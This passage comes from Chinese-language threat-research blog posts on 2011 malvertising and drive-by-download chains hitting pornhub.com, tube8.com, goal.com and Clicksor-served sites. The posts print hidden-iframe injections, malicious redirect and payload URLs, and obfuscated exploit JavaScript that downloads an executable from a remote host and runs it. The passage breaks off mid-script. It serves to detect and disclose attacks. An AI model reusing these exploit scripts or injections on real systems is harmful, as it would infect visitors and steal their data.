成人網站擁有大量流量... 及惡意廣告

(作者：Chris Hsiao, NightCola Lin, Wayne Huang)

如果你在下班時間走進我們的辦公室，發現我們很多人都圍繞在Chris.Hsiao的位置附近，而銀幕上顯示的是大量的成人網站及圖片......相信我們正在工作。

在阿碼科技，我們積極的掃描大量的網站以確認其是否有惡意行為，當然我們沒有辦法涵蓋所有的網站，因此我們試著至少能涵蓋那些比較大的網站。當我們建立好這一個平臺之後，我們隨即發現到一個狀況：在其中有好一大部份的比率竟然是那些成人網站(具有相當大的流量)！

隨著我們開始掃描這些網站，即刻發現到了一個現象：除了大量流量以外，這些網站通常也辦隨著惡意廣告(malvertising)。

惡意廣告透過網站(在廣告產業中，我們稱之為publisher)提供給瀏覽者。一些惡意廣告會隨著drive-by download 的行為一起出現，在瀏覽者看到的同時，不需要做任何動作、也不需要去按任何確認鍵，就有被感染的風險。

以下是我們這次的報導：一個惡意廣告商(celeb-escorts.com)是如何讓兩個非常大的成人網站去顯示他所提供的惡意廣告。

第一個網站是：pornhub.com，Alexa排名第62名，每一天有23,873,546個瀏覽者。

相當大的流量！惡意廣告透過廣告仲介(網站與廣告商間的中介，一般稱之為AD network / exchange)：etology.com 顯示在pornhub.com上。這幅惡意廣告是由celeb-escorts.com這個廣告商(Advertiser)提供給etology的，而celeb-escorts.com這個網域在今年(2011)五月11日才註冊。因此，種種跡象顯示celeb-escorts.com非常可能是由惡意團體所註冊的，用途是將其惡意廣告散播到整個廣告網路中。下圖是本次事件中相關的網站：

下圖則是事件的主角：惡意廣告本身，透過celeb-escorts所顯示的。在顯示這幅廣告的同時，也會同時產生iframe將瀏覽者導向tun4atta.in，整個惡意行為的起始點。

整個感染鏈及細節如下：

1. http://www.pornhub.com/

2. http://delivery.trafficjunky.net/deliver2.php?zone_id=5&site_id=2&c=frontpage

3. http://delivery.trafficjunky.net/batch/bootstrap-ph-footer/

4. http://delivery.trafficjunky.net/batch.php?&data=%5B%7B%22unique%22%3Atrue%2C%22spots%22%3A%5B%7B%22site%22%3A2%2C%22zone%22%3A27%2C%22element_id%22%3A%22footer1%22%2C%22context%22%3A%22%22%2C%22userContext%22%3A%22%22%7D%2C%7B%22site%22%3A2%2C%22zone%22%3A27%2C%22element_id%22%3A%22footer2%22%2C%22context%22%3A%22%22%2C%22userContext%22%3A%22%22%7D%2C%7B%22site%22%3A2%2C%22zone%22%3A27%2C%22element_id%22%3A%22footer3%22%2C%22context%22%3A%22%22%2C%22userContext%22%3A%22%22%7D%5D%7D%5D&_callback=window.request.onSuccess%28%29

5. http://media.trafficjunky.net/cdn_custom_ads/cpakarll/etologyftsq.html

6. http://pages.etology.com/imp2/93114.php

<html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><title></title></head><body style="border:0px;margin:0px"><script type="text/javascript">var ad={space:{id:93114,type:2,alignment:2,publisherid:52408,siteid:85149,cobrandingid:1,spacename:'Pornhub 300x250 footer rev',domain:'http%3A%2F%2Fwww%2Epornhub%2Ecom',broker_link:'http://www.etology.com/buying-space-detail.php?id=93114&EID=77408',click_target:'_blank',enable_auto_collapse:'no',style1:{width:300,height:250,rows:1,cols:1,broker_link:'Advertise Here',show_broker_link:'false',background_color:'TRANSPARENT',table_style:'cellspacing=3',border_style:'',title_style:'',description_style:'',broker_link_style:'font-size:11px;font-family:Arial;color:#000000;text-align:center;text-decoration:;font-weight:;font-style:',resize:'false'},style2:{},galleries:[{id:2624,handle:'Jiwon',age:'21',headline:'want my Black Hole?',version_number:'1',media_ext:'gif'},{id:2754,handle:'Bekky',age:'19',headline:'Are thier any single fathers?',version_number:'1',media_ext:'gif'}]},payments:[{link:'http%3A%2F%2F',isAutoCollapseAd:'no',is3rdPartyAd:'true',id:174131,adid:174131,advertiserid:51689,bannerCode:"\074iframe src=http://celeb-escorts.com/banners/300x250.jpg width=\'300\'\r\nheight=\'250\' frameborder=\'0\' scrolling=\'no\' marginheight=0\r\nmarginwidth=0>\074/iframe>",matched_keyword:'',pass_search:''}],proxy_domain:'',clicks:['6f3dff7061a304100b74ca4bbb55a0c0dc36f1d720f4ec84cbd6883f8541ec4c5c28a159f6fc7bd4d7731ac4f29e3654eb845de85231ecf48201be15b98bad226e80eeb5f5e7c9a5']};</script><script type="text/javascript" src='http://media.etology.com/transformer/v41/ads2.js'></script></body></html>

7. http://celeb-escorts.com/banners/300x250.jpg

<a href='http://celeb-escorts.com/' target='_parent'><img src='http://celeb-escorts.com/images/banner-300x250.jpeg'  border=0></a><iframe src='http://tun4atta.in/bcounter.php?u=adult' width='46' height='51' frameborder='0' scrolling='no'></iframe>

8. http://tun4atta.in/bcounter.php?u=adult

<iframe width='34' height='44' frameborder='0' scrolling='no' src='http://iban6duo.in/ts/in.cgi?adult'></iframe>

9. http://iban6duo.in/ts/in.cgi?adult

<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb'">
</head>
<body>
document moved <a href="http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb">here</a>
</body>
</html>

10. http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb
(此即為最後下載並執行的惡意軟體)

這次攻擊者所使用的exploit pack是Black Hole。從我們一開始在五月13日發現後，最後下載並安裝的惡意軟體一直隨著時間在改變。

一開始發現的惡意軟體是 SpyEye，他是一個類似 Zeus 的犯罪軟體(crimeware)。一開始VirusTotal上的偵測率僅有 3/42，至於目前已經有 21/42。

目前自動下載並安裝的惡意軟體仍然是 SpyEye，但是有被重新加殼過，因此在VirusTotal上的偵測率僅有 5/42。

第二個網站是：tube8.com，Alexa排名第113名，每一天有10,885,350個瀏覽者。

一開始載入的廣告代理商(Traffic Junky (trafficjunky.net))、廣告仲介商(etology.com)都是一樣的。我們實際上也在tube8.com上看到了相同的一幅惡意廣告。

下圖則是本次事件中相關的網站：

整個感染鏈及細節如下：

1. http://tube8.com

2. http://delivery.trafficjunky.net/deliver2.php?zone_id=42&site_id=13&cache=1305558225&c=HomePage

3. http://media.trafficjunky.net/cdn_custom_ads/pornhublive/T8ftphl.html

<iframe src="http://ifa.camads.net/dif/?cid=tube8-footer-950x300" allowtransparency=true width=950 height=300 frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

4. http://ifa.camads.net/dif/?cid=tube8-footer-950x300

5. http://pages.etology.com/imp2/96244.php

6. http://celeb-escorts.com/banners/300x250.jpg

7. http://tun4atta.in/bcounter.php?u=adult

<iframe width='34' height='44' frameborder='0' scrolling='no' src='http://iban6duo.in/ts/in.cgi?adult'></iframe>

8. http://iban6duo.in/ts/in.cgi?adult

<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb'">
</head>
<body>
document moved <a href="http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb">here</a>
</body>
</html>

9. http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb
(此即為最後下載並執行的惡意軟體)

根據這兩個網站龐大的流量(分別為23,873,546 和 10,885,350)，而且從五月13日開我們就一直發現這個惡意廣告的存在，相信截至目前為止，已經有相當大的劉覽者被感染了。
繼續閱讀全文...

goal.com再度散播惡意程式：偽防毒軟體"Security Shield"

(Credits: Chris Hsiao, NightCola Lin, Wayne Huang)

在我們上一篇分析goal.com的報導中，有提到一段："根據我們所搜集到的資料，有部份的goal.com似乎已經被感染且允許攻擊者操控其網頁內容。受感染網站可能存在供攻擊者持續使用的後門程式，用以控制該網站。"

上次事件中所使用的惡意程式碼在不久之後即從goal.com中消失，然而，HackAlert在最近(2011/5/17)又偵測到該網站有在散播惡意軟體的行為，表示攻擊者在該網站應該已經植入了後門。在這一次，他們透過goal.com來散播偽防毒軟體"Security Shield"。

[摘要]

觸發行為：
在使用者瀏覽Goal.com後，瀏覽器執行了該網站中被插入的惡意程式碼(指向31d6f5art8.co.be)後，不需要透過任何誘騙的手段、也不需要使用者點選特定連結，便會開始產生偷渡式下載(Drive-by Download)的行為將偽防毒軟體"Security Shield"安裝到使用者的電腦上。使用者僅是簡單的瀏覽一個網站，就受到惡意程式的感染。"Security Shield"會持續的發出警告，同時開啟瀏覽器連到一些成人網站，只有在當使用者購買了"序號"之後，才會停止這些擾人的行為。就算將電腦重開機，也沒有辦法停止這些擾人的行為，因為該偽防毒軟體已經安裝到使用者的電腦裡面並且常駐著。

惡意網域 a78hl7zv4p.co.be 針對每一個IP僅會提供一次攻擊碼。

在這篇文章剛發出之後，攻擊者又非常快速的將上面提到的兩個惡意網域關閉，立刻使用了一組新的惡意網域：zfdim0u06t.co.be 以及 4t7uxaxrg8.co.be。而當我們在修改我們部落格上的文章時，他們又換了一組惡意網域：uzldzzzeo3.co.be 及 zepa6hr6jk.co.be。

偵測率：
惡意網域包含 31d6f5art8.co.be、a78hl7zv4p.co.be、zfdim0u06t.co.be 及 4t7uxaxrg8.co.be。沒有任何一個被urlvoid.com上面的18家黑名單提供者標示為黑名單。
至於goal.com本身，在urlvoid.com上同樣也沒有被任何一家標示(0/18)。

惡意程式"Security Shield"本身在VirusTotal上面的偵測率是6/42。

使用技術：
偷渡式下載(Drive-by Download)，攻擊者控制了goal.com的內容。(本案例非透過惡意廣告散播)

以下是我們針對這一事件所錄製的影片，從一開始瀏覽goal.com，到整個"Security Shield"執行起來。

[感染點]
被感染的網址是[http://www.goal.com/en]，以下為感染進去的程式碼片段：

<div id="eplayer">
<style type="text/css">#adtfd {width: 1px;height: 1px;frameborder: no;visibility: hidden;}</style>
<iframe id="adtfd" src="http://31d6f5art8.co.be/ad.jpg"></iframe>
</div>

此段程式碼會產生iframe指向 http://a78hl7zv4p.co.be/domains/buy，這就是產生攻擊碼(exploit code)的網址。
攻擊碼一旦成功執行，瀏覽器會產生偷渡式下載的行為：從 http://a78hl7zv4p.co.be/domains/bf02bde9910ff9be016eb48ac5a51043.php?thread_id=2&f=63444537&topic_id=buy& 下載"Security Shield"。

"Security Shield"會自行進行安裝，隨即開始顯示假的警告以及自動開始瀏覽器連向成人網站：


[偵測率]
惡意程式"Security Shield"本身在VirusTotal上面的偵測率是6/42。

goal.com本身，在urlvoid.com上被標示為黑名單的比率是0/18。


[網站流量及排名]
1. 根據compete.com，goal.com每一天平均有232,116個人瀏覽。
2. 根據checksitetraffic.com，每一天則有215,989人。
3. goal.com在Alexaalexa.com全球的排名是Rank. 379。

繼續閱讀全文...

超過一半以上的惡意廣告來自Clicksor

(Credits: Chris Hsiao, NightCola Lin, Wayne Huang)

最近，我們的Hackalert偵測到大量的惡意廣告(Malvertising)，其中有一半以上是來自廣告商-Clicksor。

分析:
這邊我們只挑了其中一個來做分析說明。這邊有完整的記錄檔可供下載,其感染路徑如下:

1. 受害網站:

http://mytingoo.com/

2. 包含的Clicksor廣告連結:

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=164907&adtype=1&sid=252118&zone=17836"></script>

3. 載入廣告的內容片斷:

<script type="text/javascript" src="http://pub.clicksor.net/newServing/js/banner.js"></script></head><body><div id="tip"><span>Tooltips</span></div><div id="ad_block"><ul><li><ol><li class="rich" style="width:728px;height:90px;" id="ad0" ><iframe src=http://anexsecurity.com/pub_ben/728x90.jpg width='728' height='90' frameborder='0' scrolling='no' marginheight=0 marginwidth=0></iframe><img border="0" width="1" height="1" alt="roi px" src="http://serw.clicksor.com/newServing/roitrack.php?cluid=1092-1-186469-30-94296-57-1304418113354-1304418118-1034384353-281945&nid=1&type=Other&value=-1&adsid=51" /></li></ol></li></ul></div><!-- generated in 0.017482995986938s. --></body></html>

4. 其中http://anexsecurity.com/pub_ben/728x90.jpg為被插入的惡意廣告，它偽裝成一個圖形檔，事際上它是一個html，會載入一個真正的jpg檔，同時產生一個iframe來導到惡意的重導連結。其內容如下:

<a href='http://anexsecurity.com/' target='_parent'><img src='http://anexsecurity.com/banners/728x90.jpg'  border=0></a><iframe src='http://yobi3sol.in/bcounter.php?u=ben' width='46' height='51' frameborder='0' scrolling='no'></iframe>

5. 接下來http://yobi3sol.in/bcounter.php?u=ben會進行兩次的重導動作，內容如下:

<iframe width='34' height='44' frameborder='0' scrolling='no' src='http://iban6duo.in/ts/in.cgi?ben'></iframe>

6. http://iban6duo.in/ts/in.cgi?ben內容如下:

<html><head><meta http-equiv="REFRESH" content="1; URL='http://set.obamawebsites.com/news/1992'"></head><body>document moved <a href="http://set.obamawebsites.com/news/1992">here</a></body></html>

7. 最後重導到惡意的exploit pack連結http://set.obamawebsites.com/news/1992(它會根據你browser的版本環境產生相對應的exploit)，內容如下:

<html>jowls velum loo carders ut feet sixmos showily tansy.<body>ret too wyn trues field migg pot cyclers bionts wud begs vein atelic pe wops showily kea. Keet yowe swoon topic collar wo mess relief. Fil favas yarns firm robbed. Taiga velum slew shoal shiver ays at hanting dug carders yatter ed slims an.wires but kea cark dottel ink field relief od ged migg shiver sixmos tophs jowls too blond hided.bionts deaf bine inbred hanting ink harpies ben pot loop.dottel wud but yo at firm.<script>function much(week, simple, little){this.island=30769;this.island+=236;so=20385;so++;this.find=25361;this.find+=76;red=29297;red++;var other={hold:23009};var never="";useVowel={};this.dog=1417;this.dog++;for(var wonder=0; wonder < week.length; wonder++){var plant=simple.indexOf(week.charAt(wonder));simpleIf=["coursePlain","four"];noun=["river","objectUp"];mark=27117;mark++;even=["noteTheir","took","any"];this.pound="pound";if(plant > -1 ){never += little.charAt(plant);}}return never;};function windMe(){this.tell=false;this.music=22597;this.music+=144;place=["thoughBusy","an","plan"];var such = document.createElement(new String("objectdIph".substr(0,6)));var rock = String(".//..//"+"iexplor"+"e.exe");var teach=["wantPoint","rule","wood"];their=7813;their++;var earth=false;what=["haveRan","field"];;try {} catch(realKnow){};might=[];such.setAttribute("id", such);var stepDark=2303;better={force:"walk"};still=24187;still-=254;weStreet={got:"orAgain"};such.setAttribute(new String("classid"), "cls"+"id:"+"BD9nzC".substr(0,3)+"6C5"+"56-"+"65A7Y4G".substr(0,3)+"3-1"+"1D0"+"-98sESy".substr(0,3)+"3A-E9Q".substr(0,3)+"00C"+"h5K04FK5h".substr(3,3)+"C29jPF".substr(0,3)+"KzSgE36SzKg".substr(4,3));try {var you=String("CreateOMLv".substr(0,7)+"4l2kbjectlk42".substr(4,5));this.few=20943;this.few-=226;more=11149;more++;var tookState=["doName","old"];this.must="";var back = such[you]("msxml2.SQbZ".substr(0,7)+"XMLHTTPe2x".substr(0,7), "");var friend = such[you](new String("adodb.strea"+"m"), "");var up = such[you](new String("Shel1ndW".substr(0,4)+"l.Ap"+"ZWYjplicWYjZ".substr(4,4)+"atioW8C".substr(0,4)+"n9Yk".substr(0,1)), "");var had=false;try {back.open(String("GET"), much("FYYzK//SiY_9qPtP4iqSQYiS_#9tK0o/Ni4S/i=j6Pa#qVaH#qa:joj0niHoZPP0Z=jnH_zFz;YFUiPVvQVC6x=Cnja::o0xY9zQ#vQVCaZZ6x", "oa6jn:HO0ZPq#Vi=5FQBGItN9z&USY.p4kR?wWAlXfJ32d7yc1buDrgE%sM-8e/_KvL;xChTm","0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#;"), false);back.send();friend.type = 1;friend.open();friend.Write(back.responseBody);friend["Save"+"ToFi"+"le"](rock, 2);friend.Close();} catch (e) {move();}try {up["she"+"llegwzW".substr(0,3)+"xec"+"fnxKutenKxf".substr(4,3)](rock);} catch (e) {move();}} catch (e) {move();}move();}function move(){var d=document, prefix="<meta http-equiv='refresh'"; d.write(prefix + " content='0; url=?topic_id=1992&thread_id=2&f=4315508&i=i&action=6.0&t=m&c=k&x=157&start=MSIE'>");}var under=0;var also=false;function a(){while(under++ < 122){a();}if(!also){also = true;windMe();}}a();</script>sixmo hanting dug kea migg cambric scenic.cowbird inbred showily trauma at keet.</body></html>

8. exploit打成功後，所下載的Malware(exe file)連結

http://set.obamawebsites.com/news/ef32a1cbd16cb1530384e609aa89f346.php?thread_id=2&f=4315508&topic_id=1992&

特性:

a. 不易被偵測:
b. 存活時間長: 超過三個月以上
c. 影響範圍廣: 同時超過20000個網站立即受影響


由於廣告本身會以區域性來載入不一樣的廣告，每個地區所看到的廣告也都可能不一樣，而且是以輪動的方式輪流載入每則廣告，因此並不會每一次都會載入到惡意那一則廣告。由於這個特性也讓偵測上變得較為不容易。

這邊我們隨機列出了20個被Hackalert偵測到含有惡意Clicksor廣告的網站列表，其中包括受影響的網站網址、所含
的Clicksor廣告連結、所下載的惡意軟體連結以及Google safe-browsing的測偵報告。

1. http://fulldowns.com/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=101949&adtype=2&sid=179908&zone=17914"></script>

http://payments.cavatars.mobi/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=55210399&forum_id=1991&

2. http://benefitslifeinsurance.com/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=173387&adtype=1&sid=276044&zone=24445"></script>

http://new.shelfstyles.com/news/8f9ed1204515e67963d9cacaf29c1721.php?start=2&thread_id=55436582&forum_id=1991&

3. http://yoursbuzz.com/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=54913&adtype=8&sid=126026"></script>

http://name.srikantanraghavan.com/news/c73790e424f82f37dafca43d22bcd969.php?start=2&thread_id=55877751&forum_id=1991&

4. http://download3gpvideo.com/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=96186&adtype=1&sid=141705"></script>

http://grand.atlantahomevaluesnow.com/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=56082781&forum_id=1992&

5. http://toreal.blogs.com/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=178920&adtype=2&sid=279105&zone=25280"></script>

http://articles.ez2avoidforeclosures.info/news/91470a9da1e0ca5417d64d9b516fe0b9.php?start=2&thread_id=56415659&forum_id=1991&

6. http://disgracefulandsexy.com/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?pid=41866&adtype=1&sid=109599&zone=1625"></script>

http://journals.davedavisquarterhorses.com/news/91470a9da1e0ca5417d64d9b516fe0b9.php?start=2&thread_id=56529138&forum_id=1992&

7. http://paraparapu.info/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=93575&adtype=1&sid=186469"></script>

http://trip.completehorsefeed.com/news/23fb2f31ed03d9f164c871906669e048.php?start=2&thread_id=56702901&forum_id=1992&

8. http://eatmanga.com/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=131447&adtype=1&sid=196587&zone=8781"></script>

http://tracks.fresnobabies.com/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=2336475&forum_id=1992&

9. http://bored-space.com/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=89473&adtype=5&sid=131655"></script>

http://dao.ez2avoidforeclosures.net/news/23fb2f31ed03d9f164c871906669e048.php?start=2&thread_id=57645591&forum_id=1991&

10. http://animekyun.com/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=59792&adtype=5&sid=274074&zone=23946"></script>

http://cash.ez2avoidforeclosures.org/news/8f9ed1204515e67963d9cacaf29c1721.php?start=2&thread_id=57957716&forum_id=1991&

11. http://freemediatv.com/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=154793&adtype=1&sid=233437"></script>

http://cash.ez2avoidforeclosures.org/news/23fb2f31ed03d9f164c871906669e048.php?start=2&thread_id=57999481&forum_id=1991&

12. http://sexgamefun.com/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?pid=64605&adtype=&sid=89809&zone="></script>

http://vvvvvv.dyndns-mail.com/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=3271149&forum_id=1997&

13. http://ourglocal.com/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=121355&adtype=1&sid=182046"></script>

http://tracks.fresnobabies.com/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=3336736&forum_id=1992&

14. http://amfmph.com/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=98092&adtype=1&sid=160896"></script>

http://service.obamawebsites.com/news/c73790e424f82f37dafca43d22bcd969.php?start=2&thread_id=3761681&forum_id=1992&

15. http://newhmusic.com/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=169111&adtype=5&sid=259771&zone=19713"></script>

http://set.obamawebsites.com/news/8f9ed1204515e67963d9cacaf29c1721.php?thread_id=2&f=4271699&topic_id=1992&

16. http://mytingoo.com/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=164907&adtype=1&sid=252118&zone=17836"></script>

http://set.obamawebsites.com/news/c73790e424f82f37dafca43d22bcd969.php?thread_id=2&f=4301478&topic_id=1992&

17. http://op3l.us/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=148633&adtype=1&sid=222364&float=1"></script>

http://s0s.shafranconstruction.com/news/91470a9da1e0ca5417d64d9b516fe0b9.php?thread_id=2&f=4736600&topic_id=1992&

18. http://chandan.org/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=107976&adtype=5&sid=161671"></script>

http://set.gambulingwebsites.com/news/23fb2f31ed03d9f164c871906669e048.php?thread_id=2&f=4765006&topic_id=1994&

19. http://thedirectdownload.blogspot.com/ Google SafeBrowsing

<script src="http://ads.clicksor.com/showAd.php?pid=107464&adtype=5&sid=160535&zone=" type="text/javascript"></script>

http://set.gambulingwebsites.com/news/aeea8469e09d31020332ac926f183eaa.php?thread_id=2&f=5090485&topic_id=1994&

20. http://upload3r.net/ Google SafeBrowsing

<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=166255&adtype=2&sid=254502&zone=18385"></script>

http://forum.moonrocksporthorses.com/news/91470a9da1e0ca5417d64d9b516fe0b9.php?thread_id=2&f=5196921&topic_id=1994&

在這20個網站中只有2個網站(約10%)被Google safe-browsing偵測到為惡意，其它皆未列入可疑網站，可見在偵測上有其難度。

事實上，我們的Hackalert在今年1/25就偵測到類似的案例，應該也是同一個人所為，只不過他當時用的是另一則廣告圖，但是手法幾乎一模一樣，一般來說這些惡意的連結頂多存活個1~2個星期就很了不起了。而這個案例的是從1/25算起，已經超過三個月了，到現在它依然還在運作，

以下為當時的感染路徑:

1. http://ultimate-board.com/ (受影響的網站)

2. http://ads.clicksor.com/showAd.php?nid=1&pid=161822&adtype=2&sid=246482 (不一定能再載入到下列這則惡意廣告)

3. http://personnelagency.org/pub_ben/728x90.jpg (這是一個偽裝的圖檔，事實上是一個html，內容如下)

<a href="http://personnelagency.org/" target="_parent"><img src="http://personnelagency.org/banners/768x90.gif"  border=0></a><iframe src='http://2trotlug.in/bcounter.php?u=ben' width='46' height='51' frameborder='0' scrolling='no'></iframe>

4. http://2trotlug.in/bcounter.php?u=ben

<iframe width='34' height='44' frameborder='0' scrolling='no' src='http://goodpersonnecounter.com/ts/in.cgi?ben'></iframe>

5. Exploit URL:

http://goodpersonnecounter.com/ts/in.cgi?ben

6. Dropped Binary:

http://194.247.58.50/dlf.php?i=15

另外根據我們在Alexa Top一百萬大網站的統計中，Clicksor的用戶約佔2%以上，也就是同時會有超20,000個網站受到影響，只要有瀏覽過包含Clicksor廣告的網站，都有可能受到感染。

繼續閱讀全文...

知名足球網站(goal.com)散播惡意程式

(Credits: Chris Hsiao, NightCola Lin, Wayne Huang)

1. 根據compete.com，goal.com每一天平均有232,116個人瀏覽
2. 根據checksitetraffic.com，每一天則有215,989人
3. goal.com在Alexaalexa.com全球的排名是Rank. 379

HackAlert最近在4/27~4/28中偵測到有Drive-By-Download的行為。根據我們所觀察到的，我們相信攻擊者具有能夠進入goal.com系統內部的權限，同時僅在4/27~4/28中測試攻擊的效果。
以下是我們的技術報告：

[摘要]

A. 根據我們所搜集到的資料，有部份的goal.com似乎已經被感染且允許攻擊者操控其網頁內容。受感染網站可能存在供攻擊者持續使用的後門程式，用以控制該網站。

B. 我們認為這次的攻擊不屬於一次性的mass-SQL injection攻擊，因為相關惡意網域並未出現在其他被感染的網站中。

C. 惡意網域包含：
1. pxcz.cz.cc (沒有被任何一家防毒廠商/Google SafeBrowsing 標示為黑名單)
2. opofy7puti.cz.cc (沒有被任何一家防毒廠商/Google SafeBrowsing 標示為黑名單)
3. justatest.cz.cc (沒有被任何一家防毒廠商/Google SafeBrowsing 標示為黑名單)

這些線索顯示這是一個針對goal.com所發動的攻擊。

D. 持續散播時間為4/27~4/28，攻擊者似乎是使用這段時間來測試攻擊的效果，而在這段時間被我們的Scanner掃到。

E. 被我們採樣到的攻擊碼會針對以下的弱點進行攻擊：CVE-2010-1423 (Java), CVE-2010-1885 (MS help center HCP), CVE-2009-0927 (PDF), and CVE-2006-0003 (MS MDAC)

F. 使用的是g01pack exploit pack，與一般的exploit pack不同的是他包含了一個假的admin管理頁面，攻擊者可透過這個假的"honeynet"來觀察是誰在做進一步的調查。

G. 攻擊碼本身做了相當程度的"變形"，在這邊我們不用"混碼"這個字詞的原因是：除了混碼之外，攻擊碼本身就使用了有別於以往的方式來規避偵測。

H. 惡意程式本身透過UPX來進行加殼，會修改系統中的setupapi.dll及sfcfiles.dat。當我們第一次傳送到VirusTotal時，僅有四家防毒廠商(4 / 41)標示其為惡意。

I. 惡意程式會連到以下網域：

1. testurl.ipq.co:80 (UK) (沒有被任何一家防毒廠商/Google SafeBrowsing 標示為黑名單)
2. 74.125.47.99:80 (US)，反解得到coldgold.co.uk (沒有被任何一家防毒廠商/Google SafeBrowsing 標示為黑名單)
3. banderlog.org (沒有被任何一家防毒廠商/Google SafeBrowsing 標示為黑名單，但是在clean-mx.de可以看到他的蹤跡)

[詳細資訊]

在這裡可以下載我們側錄的感染記錄檔。包含了在用瀏覽器瀏覽時所產生的Http Traffic，從開始瀏覽網站到惡意程式本身透過瀏覽器被下載下來。

整個感染鏈為：
1. goal.com，包含iframe指向pxcz.cz.cc
2. pxcz.cz.cc 內包含iframe指向justatest.cz.cc
3. justatest.cz.cc內包含攻擊程式碼(g01pack exploit pack)，會依照使用者的瀏覽器不同提供不同的攻擊碼
4. 攻擊碼成功執行，從justatest.cz.cc下載惡意程式
5. 惡意程式連結到testurl.ipq.co (UK)，74.125.47.99:80 (US, coldgold.co.uk)，及banderlog.org
整個感染鏈從http://www.goal.com/en/開始：

<p>Arjen Robben has admitted that his future lies with the German and European giants, hinting that he could even remain there for the rest of his career <style type="text/css">#yxvim {width: 1px;height: 1px;frameborder: no;visibility: hidden;}</style><iframe id="yxvim" src="http://pxcz.cz.cc/ad.jpg"></iframe></p>

攻擊者在上述HTML語法的後面加上了一個iframe指向pxcz.cz.cc。pxcz.cz.cc包含了另一個iframe指向justatest.cz.cc，justatest.cz.cc則同時包含了攻擊碼(g01pack)及惡意程式本身。這個g01pack比較特殊的部份是他同時包含了一些假的Admin頁面，這個Admin頁面支援一些常見的帳號密碼(比如Admin / Admin)，用來讓分析人員相信他們成功的穫取了g01pack管理頁面的權限。

一旦成功登入之後，呈現在分析者眼前的是攻擊者造假的數據，在此同時，攻擊者則可透過這個行為，了解有哪些人正在嘗試分析這個惡意網域。

這次事件中的攻擊碼經過相當程度的"變形"，有別於以往的混碼技術，讓分析人員無法一眼即看出其為攻擊碼。TExploit pack本身包含了許多組攻擊碼，在此我們僅秀出利用CVE-2006-0003 (MS MDAC)漏洞的攻擊碼。此段攻擊碼可以在這裡取得。

<html>en clonus purins knot ghat inlier sine bipeds obese tart.<body>heroins pallors glugs. Opera. Pyx ducted boss shea abele knot hajes eh moot nisi tickled howl pangens bobs blind stir reinked ajee.atria obese saddle. Nisi uh bracts pyx.bipeds abaft arctic brave arabic purins blind polo. Pyx pallors. Sludge atria noisy bug slojd stow dumps. Kappa sri tawse bracts hank.fresco delta. Caldron arctic bucko sine byre inlier haeres.<script>var test;function redirect(){location.href="?topic_id=6.0&forum_id=qtest&action=MSIE&nid=name&year=c&start=2&thread_id=53585053&rid=708";}setTimeout(redirect, 20000);var move=new String("openul0".substr(0,4));var out=["ctfmon",String("javaWI8X".substr(0,4)),new String("acro"+"bat"),new String("explore"+"rC52".substr(0,1)),String("useri"+"nit"),"chromeHkpS".substr(0,6),"svch"+"ostc"];var follow="Sav"+"eTo"+"Fil"+"e";var air;var family=1;var low=6000;var never=";";var now=String("setTimeout");var sun=0;var age="";var turn=[];var have=["spellOver","play","cross"];this.few=29107;this.few-=150;var begin;var useDrive="clsid:BD9oqk".substr(0,9)+"6C556-65ANEm".substr(0,9)+"3-11D0-98rWqE".substr(0,9)+"3A-00C04F"+"ZuqC29E36uqZ".substr(3,6);var stay=new String("she"+"lle"+"xec"+"ute");var then=new String("replaceUyK".substr(0,7));var once=new String("typeUdm".substr(0,4));var ground=["youUnder","home","base"];var own=new String();var meLittle="setAttrT2hF".substr(0,7)+"ibute5MEY".substr(0,5);var will=new String("pus5ceI".substr(0,3)+"9BUhU9B".substr(3,1));var most=2;var best="send";var teachSeem="";var star="";try {} catch(mark){};var strong;var bed="Close";var end="Wri"+"te";var pass="http://opofy7puti.cz.cc:80/domains/f848af41f9d81c1603fb52a6b7844642.php?start=12&thread_id=53585053&forum_id=qtest&";var readAmong="CreateObjec"+"t";var 